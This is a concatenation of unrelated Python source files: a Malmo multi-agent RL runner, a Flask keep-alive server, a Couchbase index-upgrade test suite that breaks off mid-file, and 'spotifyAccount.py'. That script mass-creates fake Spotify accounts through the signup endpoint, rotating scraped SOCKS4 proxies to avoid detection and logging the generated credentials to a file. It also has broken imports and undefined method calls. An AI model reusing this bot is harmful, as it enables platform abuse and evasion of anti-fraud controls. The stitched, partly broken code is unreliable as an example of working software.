run_multi_agent.py
|
import os
from argparse import ArgumentParser
from multiprocessing import Process, active_children
from time import sleep
from common import parse_clients_args
from missions.multi_agent import MultiAgent
def agent_factory(name, role, clients, agent_type, steps, mission, mode):
from missions.multi_agent import MultiAgentEnvironment, MultiAgentStateBuilder
from malmo_rl.agents.abstract_agent import AbstractAgent
clients = parse_clients_args(clients)
recording_dir = 'records/{}'.format(mission.mission_name)
if not os.path.exists(recording_dir):
os.makedirs(recording_dir)
recording_path = os.path.join(recording_dir, '{}.tgz'.format(name))
state_builder = MultiAgentStateBuilder()
env = MultiAgentEnvironment(mission.mission_name, mission.mission_xml, clients, state_builder,
role=role, recording_path=recording_path)
if 'Observer' in name:
agent_type = 'observer'
agent = AbstractAgent(name, env, agent_type)
print(name + ' initialized.')
weights_filename = 'weights/{}/{}_{}'.format(mission.mission_name, agent_type, name)
if mode == 'training':
agent.fit(env, steps)
agent.save(weights_filename)
else:
agent.load(weights_filename)
agent.test(env, nb_episodes=10)
def run_experiment(agents_def):
assert len(agents_def) >= 1, 'Not enough agents (required: >= 1, got: %d)' \
% len(agents_def)
for agent in agents_def:
p = Process(target=agent_factory, kwargs=agent)
p.daemon = True
p.start()
try:
# wait until all agents are finished
while len(active_children()) > 0:
sleep(0.1)
except KeyboardInterrupt:
print('Caught control-c - shutting down.')
if __name__ == '__main__':
arg_parser = ArgumentParser('Malmo experiment')
arg_parser.add_argument('--ms-per-tick', type=int, default=50,
help='Malmo running speed')
arg_parser.add_argument('--clients', default='clients.txt',
help='.txt file with client(s) IP addresses')
arg_parser.add_argument('--steps', type=int, default=1000000,
help='Number of steps to train for')
    arg_parser.add_argument('--agents', default=['random', 'random', 'observer'], nargs='+',
                            help='Agent(s) to use (default is 2 Random agents and an Observer)')
arg_parser.add_argument('--mode', default='training',
help='Training or testing mode')
args = arg_parser.parse_args()
ms_per_tick = args.ms_per_tick
clients = args.clients
steps = args.steps
agents = args.agents
mode = args.mode
mission = MultiAgent(ms_per_tick)
mission_agent_names = mission.agent_names
assert len(agents) == len(mission_agent_names), '1 agent must be specified for each mission agent name'
clients = open(clients, 'r').read().splitlines()
print('Clients: {}'.format(clients))
assert len(clients) >= len(mission_agent_names), '1 Malmo client for each agent must be specified in clients.txt'
# Setup agents
agents_def = [{'name': agent_name, 'role': idx, 'clients': clients, 'agent_type': agents[idx], 'steps': steps,
'mission': mission, 'mode': mode}
for idx, agent_name in enumerate(mission_agent_names)]
run_experiment(agents_def)
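# Example invocation (a sketch based on the argument parser above; the exact agent
# names and the clients.txt address format are assumptions, not part of this file):
#
#     python run_multi_agent.py --ms-per-tick 50 --clients clients.txt \
#         --agents random random observer --mode training
#
# clients.txt is expected to hold one Malmo client address per line
# (e.g. 127.0.0.1:10000), with at least one line per agent defined in the mission.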
|
spotifyAccount.py
|
import platform
import random
import string
import threading
import request
import time
from os import system
if platform.system() == "Linux":
title = "Linux"
elif platform.system() == "Windows":
title = "Windows"
else:
title = "Mac OsX"
def setRandomName(size = 10, chars = string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
def randomPassword(size = 14, chars = string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
global maxi
global created
created = 0
errors = 0
class proxy:
def update(self):
while True:
data = ''
urls = ["https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=10000&ssl=yes"]
for url in urls:
data += request.get(url).text
self.splited += data.split("\r\n") #scrapping proxy
time.sleep(600)
def getProxy(self):
random1 = random.choice(self.splited)
return random1
def FormatProxy(self):
proxyOutput = {'https' :'socks4://'+self.get_proxy()}
return proxyOutput
def __init__(self):
self.splited = []
threading.Thread(target = self.update).start()
time.sleep(3)
proxy1 = proxy()
def creator():
global maxi
global created
global errors
while maxi > created:
if title == "Linux":
system("Spotify Account Created: {created}/{maxi} Errors:{errors}".format(created = created, maxi = maxi, errors = errors))
s = request.session()
email = setRandomName()
password = randomPassword()
data = {
"displayname":"Josh",
"creation_point":"https://login.app.spotify.com?utm_source=spotify&utm_medium=desktop-win32&utm_campaign=organic",
"birth_month":"12",
"email":email + "@gmail.com",
"password":password,
"creation_flow":"desktop",
"platform":"desktop",
"birth_year":"1991",
"iagree":"1",
"key":"4c7a36d5260abca4af282779720cf631",
"birth_day":"17",
"gender":"male",
"password_repeat":password,
"referrer":""
}
try:
r = s.post("https://spclient.wg.spotify.com/signup/public/v1/account/",data=data,proxies=proxy1.FormatProxy())
if '{"status":1,"' in r.text:
open("created.txt","a+").write(email + "@gmail.com:" + password + "\n")
created += 1
if title == "Linux":
system("title "+ f"Spotify account creator: {created}/{maxi} Errors:{errors}")
elif title == "Windows":
system("title "+ f"Spotify account creator: {created}/{maxi} Errors:{errors}")
else:
errors += 1
except:
pass
maxi = int(input("how many account do you want created ? \n"))
maxThreads = int(input("how many threads ? \n"))
num = 0
while num < maxThreads:
num += 1
threading.Thread(target=creator).start()
|
keep_alive.py
|
from flask import Flask, render_template
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Online!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
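# A minimal usage sketch (assumed caller script, e.g. a long-running bot's main.py;
# the run_bot() name below is hypothetical):
#
#     from keep_alive import keep_alive
#     keep_alive()   # start the Flask server in a background thread on port 8080
#     run_bot()      # the actual long-running work keeps the process alive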
|
upgrade_gsi.py
|
import copy
import logging
from datetime import datetime
from threading import Thread
from .base_gsi import BaseSecondaryIndexingTests
from couchbase_helper.query_definitions import QueryDefinition
from membase.helper.bucket_helper import BucketOperationHelper
from newupgradebasetest import NewUpgradeBaseTest
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection, RestHelper
log = logging.getLogger(__name__)
QUERY_TEMPLATE = "SELECT {0} FROM %s "
class UpgradeSecondaryIndex(BaseSecondaryIndexingTests, NewUpgradeBaseTest):
def setUp(self):
super(UpgradeSecondaryIndex, self).setUp()
self.initial_build_type = self.input.param('initial_build_type', None)
self.upgrade_build_type = self.input.param('upgrade_build_type', self.initial_build_type)
self.disable_plasma_upgrade = self.input.param("disable_plasma_upgrade", False)
self.rebalance_empty_node = self.input.param("rebalance_empty_node", True)
self.num_plasma_buckets = self.input.param("standard_buckets", 1)
self.initial_version = self.input.param('initial_version', '4.6.0-3653')
self.post_upgrade_gsi_type = self.input.param('post_upgrade_gsi_type', 'memory_optimized')
self.upgrade_to = self.input.param("upgrade_to")
self.index_batch_size = self.input.param("index_batch_size", -1)
self.toggle_disable_upgrade = self.input.param("toggle_disable_upgrade", False)
query_template = QUERY_TEMPLATE
query_template = query_template.format("job_title")
self.whereCondition= self.input.param("whereCondition", " job_title != \"Sales\" ")
query_template += " WHERE {0}".format(self.whereCondition)
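        # With the defaults above this builds, e.g.:
        #   SELECT job_title FROM %s WHERE job_title != "Sales"
        # where %s is presumably replaced with the bucket name by QueryDefinition.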
self.load_query_definitions = []
self.initial_index_number = self.input.param("initial_index_number", 1)
for x in range(self.initial_index_number):
index_name = "index_name_" + str(x)
query_definition = QueryDefinition(index_name=index_name, index_fields=["job_title"],
query_template=query_template, groups=["simple"])
self.load_query_definitions.append(query_definition)
if not self.build_index_after_create:
self.build_index_after_create = True
self.multi_create_index(buckets = self.buckets,
query_definitions = self.load_query_definitions)
self.build_index_after_create = False
else:
self.multi_create_index(buckets = self.buckets,
query_definitions=self.load_query_definitions)
self.skip_metabucket_check = True
def tearDown(self):
self.upgrade_servers = self.servers
super(UpgradeSecondaryIndex, self).tearDown()
def test_offline_upgrade(self):
"""
Offline Upgrade.
1) Perform Operations
2) Stop cb service on all nodes.
3) Upgrade all nodes.
4) Start cb service on all nodes.
5) Perform Operations
"""
# Perform pre_upgrade operations on cluster
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
prepare_statements = self._create_prepare_statement()
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.disconnect()
self.upgrade_servers.append(server)
upgrade_threads = self._async_update(self.upgrade_to, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.add_built_in_server_user()
ops_map = self.generate_operation_map("before")
if "create_index" in ops_map and not self.build_index_after_create:
index_name_list = []
for query_definition in self.query_definitions:
index_name_list.append(query_definition.index_name)
build_index_tasks = []
for bucket in self.buckets:
build_index_tasks.append(self.async_build_index(
bucket, index_name_list))
self._run_tasks([build_index_tasks])
self.sleep(20)
kv_ops = self.kv_mutations()
for kv_op in kv_ops:
kv_op.result()
nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
for node in nodes:
self._verify_indexer_storage_mode(node)
self.multi_query_using_index(buckets=self.buckets, query_definitions=self.load_query_definitions)
try:
self._execute_prepare_statement(prepare_statements)
except Exception as ex:
msg = "No such prepared statement"
self.assertIn(msg, str(ex), str(ex))
self._verify_index_partitioning()
def test_online_upgrade(self):
services_in = []
before_tasks = self.async_run_operations(buckets=self.buckets, phase="before")
server_out = self.nodes_out_list
self._run_tasks([before_tasks])
in_between_tasks = self.async_run_operations(buckets=self.buckets, phase="in_between")
kv_ops = self.kv_mutations()
log.info("Upgrading servers to {0}...".format(self.upgrade_to))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], self.nodes_out_list)
rebalance.result()
self.upgrade_servers = self.nodes_out_list
upgrade_th = self._async_update(self.upgrade_to, server_out)
for th in upgrade_th:
th.join()
log.info("==== Upgrade Complete ====")
self.sleep(120)
node_version = RestConnection(server_out[0]).get_nodes_versions()
for service in list(self.services_map.keys()):
for node in self.nodes_out_list:
node = "{0}:{1}".format(node.ip, node.port)
if node in self.services_map[service]:
services_in.append(service)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.nodes_out_list, [],
services=services_in)
rebalance.result()
self._run_tasks([kv_ops, in_between_tasks])
self.sleep(60)
log.info("Upgraded to: {0}".format(node_version))
nodes_out = []
for service in self.nodes_out_dist.split("-"):
nodes_out.append(service.split(":")[0])
if "index" in nodes_out or "n1ql" in nodes_out:
self._verify_bucket_count_with_index_count(query_definitions=self.load_query_definitions)
else:
self._verify_bucket_count_with_index_count()
after_tasks = self.async_run_operations(buckets=self.buckets, phase="after")
self.sleep(180)
self._run_tasks([after_tasks])
def test_online_upgrade_swap_rebalance(self):
"""
:return:
"""
before_tasks = self.async_run_operations(buckets=self.buckets, phase="before")
self._run_tasks([before_tasks])
self._install(self.nodes_in_list, version=self.upgrade_to)
in_between_tasks = self.async_run_operations(buckets=self.buckets, phase="in_between")
kv_ops = self.kv_mutations()
log.info("Swapping servers...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list)
rebalance.result()
log.info("===== Nodes Swapped with Upgraded versions =====")
self.upgrade_servers = self.nodes_in_list
self._run_tasks([kv_ops, in_between_tasks])
self.sleep(60)
nodes_out = []
for service in self.nodes_out_dist.split("-"):
nodes_out.append(service.split(":")[0])
if "index" in nodes_out or "n1ql" in nodes_out:
self._verify_bucket_count_with_index_count(query_definitions=self.load_query_definitions)
else:
self._verify_bucket_count_with_index_count()
after_tasks = self.async_run_operations(buckets=self.buckets, phase="after")
self.sleep(180)
self._run_tasks([after_tasks])
def test_online_upgrade_with_rebalance(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
community_to_enterprise = (self.upgrade_build_type == "enterprise" and self.initial_build_type == "community")
self._install(self.nodes_in_list, version=self.upgrade_to, community_to_enterprise=community_to_enterprise)
for i in range(len(self.nodes_out_list)):
node = self.nodes_out_list[i]
node_rest = RestConnection(node)
node_info = "{0}:{1}".format(node.ip, node.port)
node_services_list = node_rest.get_nodes_services()[node_info]
node_services = [",".join(node_services_list)]
active_nodes = []
for active_node in self.servers:
if active_node.ip != node.ip:
active_nodes.append(active_node)
in_between_tasks = self.async_run_operations(buckets=self.buckets,
phase="in_between")
kv_ops = self.kv_mutations()
if "index" in node_services_list:
self._create_equivalent_indexes(node)
if "n1ql" in node_services_list:
n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql",
get_all_nodes=True)
if len(n1ql_nodes) > 1:
for n1ql_node in n1ql_nodes:
if node.ip != n1ql_node.ip:
self.n1ql_node = n1ql_node
break
rebalance = self.cluster.async_rebalance(active_nodes,
[self.nodes_in_list[i]], [],
services=node_services)
rebalance.result()
log.info("===== Node Rebalanced In with Upgraded version =====")
self._run_tasks([kv_ops, in_between_tasks])
rebalance = self.cluster.async_rebalance(active_nodes, [], [node])
rebalance.result()
if "index" in node_services_list:
self.disable_upgrade_to_plasma(self.nodes_in_list[i])
self._recreate_equivalent_indexes(self.nodes_in_list[i])
self.sleep(60)
self._verify_indexer_storage_mode(self.nodes_in_list[i])
self._verify_bucket_count_with_index_count()
self.multi_query_using_index()
if self.toggle_disable_upgrade:
self.disable_plasma_upgrade = not self.toggle_disable_upgrade
after_tasks = self.async_run_operations(buckets=self.buckets, phase="after")
self._run_tasks([after_tasks])
def test_online_upgrade_with_failover(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
prepare_statements = self._create_prepare_statement()
if self.rebalance_empty_node:
self._install(self.nodes_in_list, version=self.upgrade_to)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.nodes_in_list[0]], [],
services=["index"])
rebalance.result()
for i in range(len(self.nodes_out_list)):
if self.rebalance_empty_node:
self.disable_upgrade_to_plasma(self.nodes_in_list[0])
self.set_batch_size(self.nodes_in_list[0], self.index_batch_size)
node = self.nodes_out_list[i]
node_rest = RestConnection(node)
node_info = "{0}:{1}".format(node.ip, node.port)
node_services_list = node_rest.get_nodes_services()[node_info]
node_services = [",".join(node_services_list)]
active_nodes = []
for active_node in self.servers:
if active_node.ip != node.ip:
active_nodes.append(active_node)
in_between_tasks = self.async_run_operations(buckets=self.buckets,
phase="in_between")
kv_ops = self.kv_mutations()
if "index" in node_services_list:
if self.initial_version < "5":
self._create_equivalent_indexes(node)
if "n1ql" in node_services_list:
n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql",
get_all_nodes=True)
if len(n1ql_nodes) > 1:
for n1ql_node in n1ql_nodes:
if node.ip != n1ql_node.ip:
self.n1ql_node = n1ql_node
break
failover_task = self.cluster.async_failover(
[self.master],
failover_nodes=[node],
graceful=False)
failover_task.result()
log.info("Node Failed over...")
upgrade_th = self._async_update(self.upgrade_to, [node])
for th in upgrade_th:
th.join()
log.info("==== Upgrade Complete ====")
self.sleep(120)
rest = RestConnection(self.master)
nodes_all = rest.node_statuses()
for cluster_node in nodes_all:
if cluster_node.ip == node.ip:
log.info("Adding Back: {0}".format(node))
rest.add_back_node(cluster_node.id)
rest.set_recovery_type(otpNode=cluster_node.id,
recoveryType="full")
log.info("Adding node back to cluster...")
rebalance = self.cluster.async_rebalance(active_nodes, [], [])
rebalance.result()
self._run_tasks([kv_ops, in_between_tasks])
ops_map = self.generate_operation_map("before")
if "index" in node_services:
if self.initial_version < "5":
self._remove_equivalent_indexes(node)
self.sleep(60)
self._verify_indexer_storage_mode(node)
self._verify_throttling(node)
self.wait_until_indexes_online()
if self.index_batch_size != 0:
count = 0
verify_items = False
while count < 15 and not verify_items:
try:
self._verify_bucket_count_with_index_count()
verify_items = True
except Exception as e:
msg = "All Items didn't get Indexed"
if msg in str(e) and count < 15:
count += 1
self.sleep(20)
else:
raise e
self.multi_query_using_index()
self._execute_prepare_statement(prepare_statements)
if self.toggle_disable_upgrade:
self.disable_plasma_upgrade = not self.disable_plasma_upgrade
def test_online_upgrade_with_rebalance_failover(self):
nodes_out_list = copy.deepcopy(self.nodes_out_list)
self.nodes_out_list = []
self.nodes_out_list.append(nodes_out_list[0])
self.test_online_upgrade_with_rebalance()
self.multi_drop_index()
if self.toggle_disable_upgrade:
self.disable_plasma_upgrade = not self.toggle_disable_upgrade
self.nodes_out_list.append(nodes_out_list[1])
self.test_online_upgrade_with_failover()
def test_downgrade_plasma_to_fdb_failover(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.disconnect()
self.upgrade_servers.append(server)
upgrade_threads = self._async_update(self.upgrade_to, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
self.add_built_in_server_user()
indexer_node = self.get_nodes_from_services_map(service_type="index")
rest = RestConnection(indexer_node)
rest.set_downgrade_storage_mode_with_rest(self.disable_plasma_upgrade)
failover_task = self.cluster.async_failover(
[self.master],
failover_nodes=[indexer_node],
graceful=False)
failover_task.result()
log.info("Node Failed over...")
rest = RestConnection(self.master)
nodes_all = rest.node_statuses()
for cluster_node in nodes_all:
if cluster_node.ip == indexer_node.ip:
log.info("Adding Back: {0}".format(indexer_node))
rest.add_back_node(cluster_node.id)
rest.set_recovery_type(otpNode=cluster_node.id,
recoveryType="full")
log.info("Adding node back to cluster...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
self.sleep(20)
self._verify_indexer_storage_mode(indexer_node)
self.multi_query_using_index()
def test_downgrade_plasma_to_fdb_rebalance(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.disconnect()
self.upgrade_servers.append(server)
upgrade_threads = self._async_update(self.upgrade_to, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
self.add_built_in_server_user()
for indexer_node in self.nodes_in_list:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[indexer_node], [],
services=["index"])
rebalance.result()
rest = RestConnection(indexer_node)
rest.set_downgrade_storage_mode_with_rest(self.disable_plasma_upgrade)
deploy_node_info = ["{0}:{1}".format(indexer_node.ip,
indexer_node.port)]
for bucket in self.buckets:
for query_definition in self.query_definitions:
query_definition.index_name = query_definition.index_name + "_replica"
self.create_index(bucket=bucket, query_definition=query_definition,
deploy_node_info=deploy_node_info)
self.sleep(20)
self._verify_indexer_storage_mode(indexer_node)
self.multi_query_using_index()
self._remove_equivalent_indexes(indexer_node)
self.disable_plasma_upgrade = not self.disable_plasma_upgrade
def test_upgrade_with_memdb(self):
"""
        Keep the N1QL node co-located with one of the KV nodes
:return:
"""
self.set_circular_compaction = self.input.param("set_circular_compaction", False)
kv_nodes = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
log.info("Upgrading all kv nodes...")
for node in kv_nodes:
log.info("Rebalancing kv node {0} out to upgrade...".format(node.ip))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
[node])
rebalance.result()
self.servers.remove(node)
upgrade_th = self._async_update(self.upgrade_to, [node])
for th in upgrade_th:
th.join()
self.sleep(120)
log.info("Rebalancing kv node {0} in after upgrade...".format(node.ip))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node], [],
services=['kv'])
self.servers.insert(0, node)
rebalance.result()
log.info("===== KV Nodes Upgrade Complete =====")
log.info("Upgrading all query nodes...")
query_nodes = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=True)
log.info("Rebalancing query nodes out to upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
query_nodes)
rebalance.result()
upgrade_th = self._async_update(self.upgrade_to, query_nodes)
for th in upgrade_th:
th.join()
self.sleep(120)
services_in = ["n1ql" for x in range(len(query_nodes))]
log.info("Rebalancing query nodes in after upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
query_nodes, [],
services=services_in)
rebalance.result()
log.info("===== Query Nodes Upgrade Complete =====")
kv_ops = self.kv_mutations()
log.info("Upgrading all index nodes...")
index_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
log.info("Rebalancing index nodes out to upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
index_nodes)
rebalance.result()
upgrade_th = self._async_update(self.upgrade_to, index_nodes)
self.sleep(120)
rest = RestConnection(self.master)
log.info("Setting indexer storage mode to {0}...".format(self.post_upgrade_gsi_type))
status = rest.set_indexer_storage_mode(storageMode=self.post_upgrade_gsi_type)
if status:
log.info("====== Indexer Mode Set to {0}=====".format(self.post_upgrade_gsi_type))
else:
            log.info("====== Indexer Mode is not set to {0}=====".format(self.post_upgrade_gsi_type))
for th in upgrade_th:
th.join()
self._run_tasks([kv_ops])
log.info("===== Index Nodes Upgrade Complete =====")
services_in = ["index" for x in range(len(index_nodes))]
log.info("Rebalancing index nodes in after upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
index_nodes, [],
services=services_in)
rebalance.result()
self.sleep(60)
if self.set_circular_compaction:
DAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
rest = RestConnection(servers[0])
date = datetime.now()
dayOfWeek = (date.weekday() + (date.hour+((date.minute+5)//60))//24)%7
status, content, header = rest.set_indexer_compaction(indexDayOfWeek=DAYS[dayOfWeek],
indexFromHour=date.hour+((date.minute+1)//60),
indexFromMinute=(date.minute+1)%60)
self.assertTrue(status, "Error in setting Circular Compaction... {0}".format(content))
self.multi_create_index(self.buckets, self.query_definitions)
self._verify_bucket_count_with_index_count()
self.multi_query_using_index(self.buckets, self.query_definitions)
def test_online_upgrade_path_with_rebalance(self):
pre_upgrade_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_upgrade_tasks])
threads = [Thread(target=self._async_continuous_queries, name="run_query")]
kvOps_tasks = self.async_run_doc_ops()
for thread in threads:
thread.start()
self.nodes_upgrade_path = self.input.param("nodes_upgrade_path", "").split("-")
for service in self.nodes_upgrade_path:
nodes = self.get_nodes_from_services_map(service_type=service, get_all_nodes=True)
log.info("----- Upgrading all {0} nodes -----".format(service))
for node in nodes:
node_rest = RestConnection(node)
node_info = "{0}:{1}".format(node.ip, node.port)
node_services_list = node_rest.get_nodes_services()[node_info]
node_services = [",".join(node_services_list)]
if "index" in node_services_list:
if len(nodes) == 1:
threads = []
else:
self._create_equivalent_indexes(node)
if "n1ql" in node_services_list:
if len(nodes) > 1:
for n1ql_node in nodes:
if node.ip != n1ql_node.ip:
self.n1ql_node = n1ql_node
break
log.info("Rebalancing the node out...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [node])
rebalance.result()
active_nodes = []
for active_node in self.servers:
if active_node.ip != node.ip:
active_nodes.append(active_node)
log.info("Upgrading the node...")
upgrade_th = self._async_update(self.upgrade_to, [node])
for th in upgrade_th:
th.join()
self.sleep(120)
log.info("==== Upgrade Complete ====")
log.info("Adding node back to cluster...")
rebalance = self.cluster.async_rebalance(active_nodes,
[node], [],
services=node_services)
rebalance.result()
self.sleep(100)
node_version = RestConnection(node).get_nodes_versions()
log.info("{0} node {1} Upgraded to: {2}".format(service, node.ip, node_version))
ops_map = self.generate_operation_map("in_between")
if not "drop_index" in ops_map:
if "index" in node_services_list:
self._recreate_equivalent_indexes(node)
else:
self.multi_create_index()
self._verify_scan_api()
self._create_replica_indexes()
self.multi_query_using_index(verify_results=False)
if "create_index" in ops_map:
for bucket in self.buckets:
for query_definition in self.query_definitions:
self.drop_index(bucket.name, query_definition)
self._run_tasks([kvOps_tasks])
for thread in threads:
thread.join()
self.sleep(60)
self._verify_create_index_api()
buckets = self._create_plasma_buckets()
self.load(self.gens_load, buckets=buckets, flag=self.item_flag, batch_size=self.batch_size)
self.multi_create_index(buckets=buckets, query_definitions=self.query_definitions)
self.multi_query_using_index(buckets=buckets, query_definitions=self.query_definitions)
self._verify_gsi_rebalance()
self._verify_index_partitioning()
def kv_mutations(self, docs=None):
if not docs:
docs = self.docs_per_day
gens_load = self.generate_docs(docs)
tasks = self.async_load(generators_load=gens_load, batch_size=self.batch_size)
return tasks
def _run_tasks(self, tasks_list):
for tasks in tasks_list:
for task in tasks:
task.result()
def _verify_create_index_api(self):
"""
1. Get Indexer and Query Versions
2. Run create query with explain
3. Verify the api returned
:return:
"""
old_api = False
node_map = self._get_nodes_with_version()
log.info(node_map)
for node, vals in node_map.items():
if vals["version"] < "5":
old_api = True
break
create_index_query_age = "CREATE INDEX verify_api ON default(age DESC)"
try:
query_result = self.n1ql_helper.run_cbq_query(query=create_index_query_age,
server=self.n1ql_node)
except Exception as ex:
if old_api:
msgs = ["'syntax error - at DESC'",
"This option is enabled after cluster is fully upgraded and there is no failed node"]
desc_error_hit = False
for msg in msgs:
if msg in str(ex):
desc_error_hit = True
break
if not desc_error_hit:
log.info(str(ex))
raise
else:
log.info(str(ex))
raise
def _verify_scan_api(self):
"""
1. Get Indexer and Query Versions
2. Run create query with explain
3. Verify the api returned
:return:
"""
node_map = self._get_nodes_with_version()
for query_definition in self.query_definitions:
query = query_definition.generate_query_with_explain(bucket=self.buckets[0])
actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
log.info(actual_result)
old_api = False
api_two = False
for node, vals in node_map.items():
if vals["version"] < "5":
old_api = True
break
elif vals["version"] < "5.5":
api_two = True
if not old_api and api_two:
msg = "IndexScan2"
self.assertIn(msg, str(actual_result), "IndexScan2 is not used for Spock Nodes")
elif not old_api and not api_two:
msg = "IndexScan3"
self.assertIn(msg, str(actual_result), "IndexScan3 is not used for Vulcan Nodes")
def _create_replica_indexes(self):
nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
create_index_query = "CREATE INDEX index_replica_index ON default(age) USING GSI WITH {{'num_replica': {0}}};".format(len(nodes)-1)
try:
query_result = self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
old_api = False
node_map = self._get_nodes_with_version()
log.info(node_map)
for node, vals in node_map.items():
if vals["version"] < "5":
old_api = True
msg = "Fails to create index with replica"
if msg in str(ex):
break
if not old_api:
log.info(str(ex))
raise
else:
drop_index_query = "DROP INDEX default.index_replica_index"
query_result = self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
def _recreate_equivalent_indexes(self, index_node):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5":
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info(index_map)
lost_indexes = {}
for bucket, index in index_map.items():
for index, vals in index.items():
if "_replica" in index:
if not index in list(lost_indexes.keys()):
lost_indexes[index] = []
lost_indexes[index].append(bucket)
deploy_node_info = ["{0}:{1}".format(index_node.ip, index_node.port)]
for index, buckets in lost_indexes.items():
for query_definition in self.query_definitions:
if query_definition.index_name == index:
query_definition.index_name = query_definition.index_name.split("_replica")[0]
for bucket in buckets:
bucket = [x for x in self.buckets if x.name == bucket][0]
self.create_index(bucket=bucket,
query_definition=query_definition,
deploy_node_info=deploy_node_info)
self.sleep(20)
query_definition.index_name = index
for bucket in buckets:
bucket = [x for x in self.buckets if x.name == bucket][0]
self.drop_index(bucket, query_definition)
self.sleep(20)
query_definition.index_name = query_definition.index_name.split("_replica")[0]
def _remove_equivalent_indexes(self, index_node):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] > "5":
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info(index_map)
for query_definition in self.query_definitions:
if "_replica" in query_definition.index_name:
for bucket in self.buckets:
self.drop_index(bucket, query_definition)
self.sleep(20)
query_definition.index_name = query_definition.index_name.split("_replica")[0]
def _create_equivalent_indexes(self, index_node):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5":
index_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
index_nodes = [x for x in index_nodes if x.ip != index_node.ip]
if index_nodes:
ops_map = self.generate_operation_map("in_between")
if "create_index" not in ops_map:
lost_indexes = self._find_index_lost_when_indexer_down(index_node)
deploy_node_info = ["{0}:{1}".format(index_nodes[0].ip,
index_nodes[0].port)]
for index, buckets in lost_indexes.items():
for query_definition in self.query_definitions:
if query_definition.index_name == index:
query_definition.index_name = query_definition.index_name + "_replica"
for bucket in buckets:
bucket = [x for x in self.buckets if x.name == bucket][0]
self.create_index(bucket=bucket,
query_definition=query_definition,
deploy_node_info=deploy_node_info)
self.sleep(20)
def _find_index_lost_when_indexer_down(self, index_node):
lost_indexes = {}
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info("index_map: {0}".format(index_map))
host = "{0}:8091".format(index_node.ip)
for bucket, index in index_map.items():
for index, vals in index.items():
if vals["hosts"] == host:
if not index in list(lost_indexes.keys()):
lost_indexes[index] = []
lost_indexes[index].append(bucket)
log.info("Lost Indexes: {0}".format(lost_indexes))
return lost_indexes
def _get_nodes_with_version(self):
rest_conn = RestConnection(self.master)
nodes = rest_conn.get_nodes()
map = {}
for cluster_node in nodes:
map[cluster_node.ip] = {"version": cluster_node.version,
"services": cluster_node.services}
return map
def _create_prepare_statement(self):
prepare_name_query = {}
for bucket in self.buckets:
prepare_name_query[bucket.name] = {}
for query_definition in self.query_definitions:
query = query_definition.generate_query(bucket=bucket)
name = "prepare_" + query_definition.index_name + bucket.name
query = "PREPARE " + name + " FROM " + query
result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
self.assertEqual(result['status'], 'success', 'Query was not run successfully')
prepare_name_query[bucket.name][query_definition.index_name] = name
return prepare_name_query
def _execute_prepare_statement(self, prepare_name_query):
for bucket in self.buckets:
for query_definition in self.query_definitions:
prepared_query = "EXECUTE " + prepare_name_query[bucket.name][query_definition.index_name]
result = self.n1ql_helper.run_cbq_query(query=prepared_query, server=self.n1ql_node)
self.assertEqual(result['status'], 'success', 'Query was not run successfully')
def _async_continuous_queries(self):
